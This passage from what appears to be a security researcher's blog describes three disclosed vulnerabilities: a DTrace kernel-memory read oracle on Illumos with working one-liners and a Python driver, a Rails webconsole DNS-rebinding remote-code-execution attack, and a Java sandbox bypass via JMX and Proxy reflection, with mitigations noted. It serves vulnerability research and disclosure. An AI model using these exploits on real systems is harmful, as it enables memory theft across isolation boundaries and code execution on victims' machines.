  3. We can change the pointer stored in the dttk_value field by doing: *(unsigned long*)addr = 0xdeadbeefdeadbeefL and trigger a kernel panic by looking up a value in the hash by doing &hash[1,buf][0].

      [root@web01 ~]# dtrace -n 'char buf[1]; BEGIN {buf[0]=0xff;hash[1,buf]="h";addr = (&hash[1, buf][0]) - 0x28; print(addr); *(unsigned long*)addr = 0xdeadbeefdeadbeefL; &hash[1,buf][0]}'
      dtrace: description 'char buf[1]' matched 1 probe
    
  4. We can turn this into a memory oracle: instead of writing a rubbish address we write the address of the byte we want to check. If we set dynvarsize=36 then DTrace will only return a hash value if the byte at that address is equal to the original buf[0]=?? key, because when they are not equal DTrace tries to allocate another chunk in the hash and there is no space left for it.

Example where the byte mismatches buf[0]=0xff:

[root@web01 ~]# dtrace -x dynvarsize=36 -n 'char buf[1]; BEGIN {buf[0]=0xff;hash[1,buf]="h";addr = (&hash[1, buf][0]) - 0x28; *(void**)addr = &`dtrace_dynhash_sink; print(&hash[1,buf][0])}'
dtrace: description 'char buf[1]' matched 1 probe
dtrace: 1 dynamic variable drop

Example where the byte matches buf[0]=0x1:

[root@web01 ~]# dtrace -x dynvarsize=36 -n 'char buf[1]; BEGIN {buf[0]=0x1;hash[1,buf]="h";addr = (&hash[1, buf][0]) - 0x28; *(void**)addr = &`dtrace_dynhash_sink; print(&hash[1,buf][0])}'
dtrace: description 'char buf[1]' matched 1 probe
CPU     ID                    FUNCTION:NAME
  0      1                           :BEGIN char * 0xffffff00d80cb4d8

Doing 256 syscalls to read 1 byte is slow but the global ps is still responsive :)
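
Automating the oracle is just a matter of running one probe per candidate byte and watching for the dynamic variable drop. A rough sketch of a driver, assuming the same one-liner shape as the examples above with the candidate byte and the target kernel address substituted in, and assuming the drop message shows up in dtrace's output:

import subprocess

D_TEMPLATE = (
    'char buf[1]; BEGIN {{ buf[0] = {candidate}; hash[1, buf] = "h"; '
    'addr = (&hash[1, buf][0]) - 0x28; '
    '*(unsigned long*)addr = {target:#x}; '
    'print(&hash[1, buf][0]) }}'
)

def byte_matches(target, candidate):
    # one probe per candidate: if the kernel byte at `target` equals
    # `candidate` the lookup finds the entry and dtrace prints a value,
    # otherwise the tiny dynvarsize forces a dynamic variable drop
    script = D_TEMPLATE.format(candidate=candidate, target=target)
    proc = subprocess.run(
        ["dtrace", "-x", "dynvarsize=36", "-n", script],
        capture_output=True, text=True)
    return "dynamic variable drop" not in (proc.stdout + proc.stderr)

def read_byte(target):
    for candidate in range(256):
        if byte_matches(target, candidate):
            return candidate
    return None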

POC Code on Github

DTrace STRSTR

If you look at the DTrace user guide it has this definition for the strstr function:

string strstr(const char *s, const char *subs)

strstr returns a pointer to the first occurrence of the substring subs in the string s. If s is an empty string, strstr returns a pointer to an empty string. If no match is found, strstr returns 0.

The dtrace_canload function takes a pointer and a size for checking whether a range can be accessed. However, the strstr function just takes a pointer to a string. How is it possible for strstr to call dtrace_canload to check whether the string can be safely searched? The original implementation only checked dtrace_canload after the string had been searched.

case DIF_SUBR_STRRCHR: {
  /*
   * We're going to iterate over the string looking for the
   * specified character.  We will iterate until we have reached
   * the string length or we have found the character.  If this
   * is DIF_SUBR_STRRCHR, we will look for the last occurrence
   * of the specified character instead of the first.
   */
  uintptr_t saddr = tupregs[0].dttk_value;
  uintptr_t addr = tupregs[0].dttk_value;
  uintptr_t limit = addr + state->dts_options[DTRACEOPT_STRSIZE];
  char c, target = (char)tupregs[1].dttk_value;

  for (regs[rd] = NULL; addr < limit; addr++) {
    if ((c = dtrace_load8(addr)) == target) {
      regs[rd] = addr;

      if (subr == DIF_SUBR_STRCHR)
        break;
    }

    if (c == '\0')
      break;
  }

  if (!dtrace_canload(saddr, addr - saddr, mstate, vstate)) {
    regs[rd] = NULL;
    break;
  }

  break;
}

There doesn't seem to be any way to observe the result in regs[rd] before it is clobbered when dtrace_canload fails. All of this data is only visible to the current thread and is not accessible globally. However, Illumos provides access to the hardware performance counters and allows you to restrict them to counting only while in the kernel.

It is possible to set DTRACEOPT_STRSIZE to an arbitrary value. So if strsize is set to 1 then only one byte will be checked against the search value supplied to the strchr function. This effectively means the strchr function is checking if the byte at an address is a specific value. The number of instructions or branches taken will be different depending on whether the byte at the address is null, the byte at the address matches or the byte at the address is different.

If we set the performance counter to PAPI_br_ins (branch instructions taken), on my machine it will take 645 branches for a correct value and 646 for an incorrect value. Also, it will always take 645 for a zero value. So by iterating through the byte values (1-255) and calling strchr on each it is possible to read an arbitrary byte.

There is some noise which I suspect is caused by paging which can cause higher values but if you discard any result that does not match 646 or 645 and try again then this works out.

There is also a weird extra branch taken for some addresses. I believe this is because of the toxic range check. The toxic range check is done by addr > START && addr < END so depending on whether addr > START or not there will be a difference in the number of branches taken. (We ignore addr < END because we don't try to read from toxic ranges.) This read is not ambiguous because the extra branch translates to either every byte not matching (all 646) or one byte not matching (646) and all the other bytes having an unknown result (647).
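
A sketch of the decoding logic for the base (no extra branch) case, assuming a hypothetical probe_branches(addr, candidate) helper that programs the PAPI_br_ins counter, fires the strsize=1 strchr() probe for one candidate byte and returns the kernel-side branch count; it ignores the extra-branch case described above:

MATCH, MISMATCH = 645, 646   # counts observed on the author's machine

def read_byte(probe_branches, addr):
    while True:
        counts = {c: probe_branches(addr, c) for c in range(1, 256)}
        if any(v not in (MATCH, MISMATCH) for v in counts.values()):
            continue                      # paging noise: retry the whole byte
        hits = [c for c, v in counts.items() if v == MATCH]
        if len(hits) == len(counts):
            return 0                      # a NUL byte short-circuits every probe
        if len(hits) == 1:
            return hits[0]                # exactly one candidate matched
        # anything else is inconsistent, keep retrying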

Again we plug this vulnerability into our exploit framework and dump memory from arbitrary processes in other zones. :)

POC Code on Github

Rails Webconsole DNS Rebinding

The webconsole gem which ships with the Rails development server allows remote code execution via DNS rebinding. I reported this issue to Rails on April 20th 2015. However, it may have been reported to them earlier because Homakov also found the issue independently and tweeted about it here.

Since this issue is semi-public I think it is better that the problem is made public rather than waiting for a fix that may never appear. It is also important to note that many developer setups are probably not vulnerable because they are using Pow to run Rails applications or their upstream DNS servers apply DNS rebinding protection.

The problem is that the same-origin policy in browsers is broken for IP-based security unless the server checks that the Host header is what it expects it to be. And it looks like Rails development mode does not do any checking of the Host header to see that it is 127.0.0.1 or localhost.
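
The missing check is tiny. This is not how Rails would implement it, just a minimal WSGI-style sketch of the idea: refuse any request whose Host header isn't one the development server expects, which is exactly what defeats the rebinding trick.

ALLOWED_HOSTS = {"localhost", "localhost:3000", "127.0.0.1", "127.0.0.1:3000"}

def host_check_middleware(app):
    # wrap a WSGI app and reject requests with an unexpected Host header
    def wrapped(environ, start_response):
        if environ.get("HTTP_HOST") not in ALLOWED_HOSTS:
            start_response("403 Forbidden", [("Content-Type", "text/plain")])
            return [b"blocked: unexpected Host header\n"]
        return app(environ, start_response)
    return wrapped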

The attack looks something like this:

  1. Attacker tricks user into going to a website they control. For example reallycoolflashgame.com (nothing looks suspicious..)
  2. Attacker opens an iframe to sdjhskdf87.reallycoolflashgame.com:3000 (SOP policy is based on the port number and we open this in an iframe so we don’t tip off the user that something suspicious is going on)
  3. sdjhskdf87.reallycoolflashgame.com is a DNS record with a really short TTL. For example 60 seconds. Attacker then changes the DNS record to point from their IP address to 127.0.0.1
  4. The original html page at sdjhskdf87.reallycoolflashgame.com:3000 starts making XHR requests after the TTL has expired. These requests get routed to the rails app and they can trigger the debug functionality remotely.

I have a website that simulates this attack. If you visit this website on OSX and it starts Calculator.app then you are definitely vulnerable. However, if it does not work that might just be because the attack is buggy, so it is not proof that you don't have a vulnerable setup.

  1. create a new rails project with rails new demo
  2. cd demo; rails server
  3. go to http://www.dnsrebinder.net/ in your browser
  4. You will have to wait about 60-80 seconds and if you are running OSX it will pop a calculator. If you are running something else it won’t do anything useful :(. You can monitor what is happening in Chrome Developer tools. If you see a request that generates a 404 this is evidence that the DNS rebinding was successful.

It might not work if your router or upstream DNS provider is filtering private IP ranges in DNS lookups. So you might have to set your DNS server to point to 8.8.8.8 (Google DNS).

Mitigations

  1. Remove webconsole gem from your Gemfile.
  2. Use pow.cx which hosts your Rails application under the .dev domain namespace and do not spawn Rails applications using the ‘rails server’ command.
  3. Use a DNS server that applies DNS rebinding filtering. It is important that it filters 127.0.0.0/8 and the IPv6 local addresses. In particular Rails 5 Puma only binds to the IPv6 local address under OSX.

Update

The same vulnerability affects the better_errors gem. Thanks to @mikeycgto for the pointer.

ZDI-13-XXX (2013) Java Sandbox Bypass (1.7.0_10) / (1.6.0_38) via Proxy and JMX

This is part of a series of posts detailing Java Sandbox Bypasses that were disclosed between 2012-2013. You can view the other bugs by going back to the original post.

The last two vulnerabilities I wrote up (ZDI-13-246, ZDI-13-075) involved heap spraying so were not 100% reliable. Most of my sandbox bypasses against the JVM did not use memory corruption or heap spraying so were 100% reliable. These reliable sandbox bypasses fell into two main categories:

First, there were vulnerabilities that would try to create a chain from privileged code to a 'dangerous' function without touching any user frames. Java uses stack walking to decide whether a dangerous function (System.setSecurityManager(null), Runtime.exec) is allowed to proceed, so if you could create such a chain then you could subvert the protection.

Second, there were vulnerabilities that got access to methods in the 'protected packages'. After getting access to these packages it is usually trivial to escalate out of the sandbox because it is assumed user code cannot access these methods. Access to these packages usually involved abusing reflection, or abusing parts of the JDK that used reflection but did not do so securely. This vulnerability, which has existed at least since Java 5, is a good example of abusing reflection to access privileged packages.

This bug is interesting because there is no ZDI public disclosure for it. I suspect this is because Adam Gowdiak disclosed it to Oracle first. Looking back, I also suspect I may have sniped this vulnerability from Adam Gowdiak. Gowdiak seems to have a habit of partially publicly disclosing Java bugs before they are fixed. Another bug I disclosed to ZDI, ZDI-13-079, was based on a post he made to the full disclosure mailing list and I definitely sniped that bug from him. I can't remember the exact details of how I found this bug, but I remember Gowdiak made a presentation where he said 'com.sun.xml.internal.bind.v2.model.nav.Navigator' was an interesting class. It is possible that I was able to reverse the underlying bug from this.

Vulnerabilities

Three vulnerabilities are used to bypass the sandbox.

  1. Accessing Class instances in protected packages.
  2. Reading fields on interfaces in protected packages.
  3. Getting access to java.lang.reflect.Method for interface methods in protected packages.

Loading Classes in Protected Packages

The JmxMBeanServer class allows you to load classes from protected packages. This isn’t possible in Java 6.

server = JmxMBeanServer.newMBeanServer("", null, null, true);
server.getMBeanInstantiator().findClass(className, (ClassLoader)null);

findClass in MBeanInstantiator ends up calling loadClass(className, null) which will end up performing Class.forName(className).

MBeanInstantiator.loadClass:
static Class<?> loadClass(String className, ClassLoader loader)
    throws ReflectionException {

    Class<?> theClass;
    if (className == null) {
        throw new RuntimeOperationsException(new
            IllegalArgumentException("The class name cannot be null"),
                          "Exception occurred during object instantiation");
    }
    try {
        if (loader == null)
            loader = MBeanInstantiator.class.getClassLoader();
        if (loader != null) {
            theClass = Class.forName(className, false, loader);
        } else {
            theClass = Class.forName(className);
        }
    } catch (ClassNotFoundException e) {
        throw new ReflectionException(e,
        "The MBean class could not be loaded");
    }
    return theClass;
}

Reading Fields on Interfaces in Protected Packages

If you call Proxy.getProxyClass(null, new Class[]{targetClass}) then the generated proxy class will have all the fields from targetClass. Because the generated proxy class is not in a protected package, user code can call proxyClass.getFields(), which will give back the java.lang.reflect.Field objects, and because the fields are public, calls to Field#get will succeed. The proxy class successfully loads because it is defined in the root class loader.

Getting Access to Method objects for Interface Methods in Protected Packages

This uses a similar vulnerability to the one above. You can think of the Proxy instance as a machine that will convert its own Method objects into Method objects for a particular interface. If you look at proxyClass.getDeclaredMethods() for com.sun.xml.internal.bind.v2.model.nav.Navigator you will see something like:

public final boolean $Proxy0.isFinal(java.lang.Object)
public final boolean $Proxy0.isArray(java.lang.Object)
..

If you call $Proxy0.isFinal(java.lang.Object) then it will convert this Method into Navigator.isFinal(java.lang.Object) before passing it to the InvocationHandler.

To access a Method on an interface in a protected package all you have to do is create an InvocationHandler that will save the Method then invoke the corresponding public method on the proxy class.

Once an attacker has access to the Method then they are free to invoke it because the Method is public and no more access checks are performed.

Exploit

  1. We use the JMX class loading vulnerability to load the class "com.sun.xml.internal.bind.v2.model.nav.Navigator".
  2. We then use the field reading vulnerability to read the REFLECTION field from the interface.
  3. We then use the interface method vulnerability to read the getDeclaredMethods(Object o) method from the Navigator class.

Now that we have a way of getting Methods from a protected class (getDeclaredMethods) and a way of loading protected classes (the JMX vulnerability) we can easily subvert the JVM sandbox. There are probably 100 ways of doing this because once you can execute arbitrary static methods in the protected packages it is game over for the JVM. We will use a technique similar to the one disclosed in ZDI-13-159 in order to disable the sandbox, except we will modify it slightly so it only uses JDK 6 classes.

  1. We use com.sun.xml.internal.bind.v2.ClassFactory#create(Class) to create a sun.reflect.ReflectionFactory$GetReflectionFactoryAction
  2. We use com.sun.xml.internal.ws.api.server.InstanceResolver#createSingleton to create an InstanceResolver object
  3. We use com.sun.xml.internal.ws.api.server.InstanceResolver#createInvoker to create an Invoker object
  4. We use com.sun.xml.internal.ws.api.server.Invoker#invoke to invoke AccessController#doPrivileged with the PrivilegedAction in step 1 to create a ReflectionFactory object.
  5. We invoke sun.reflect.ReflectionFactory#newField with parameters that correspond to the Statement#acc field
  6. We invoke sun.reflect.ReflectionFactory#newFieldAccessor with the new field object.
  7. We create a Statement object that executes System.setSecurityManager(null);
  8. We invoke sun.reflect.FieldAccessor#set(Object, Object) with a Statement object we have created and a AccessControlContext that gives us all permissions
  9. We execute the Statement which disables the JVM security.

Exploit Java 6

We use the same technique as above but we use the XSLT class loading hack disclosed in ZDI-13-159 to load the classes because this works in Java 6.

Testing (Java 7)

The POC is available from Github

java -Djava.security.manager ProxyAbuse or appletviewer test.html

It will try to print the user's home directory and execute an AppleScript that will say some stuff.

Testing (Java 6)

The POC is available from Github

java -Djava.security.manager Harness or appletviewer test.html

It will try to print the user's home directory and execute an AppleScript that will say some stuff.

Fixes

User code probably shouldn't be able to load proxy classes in the bootstrap class loader.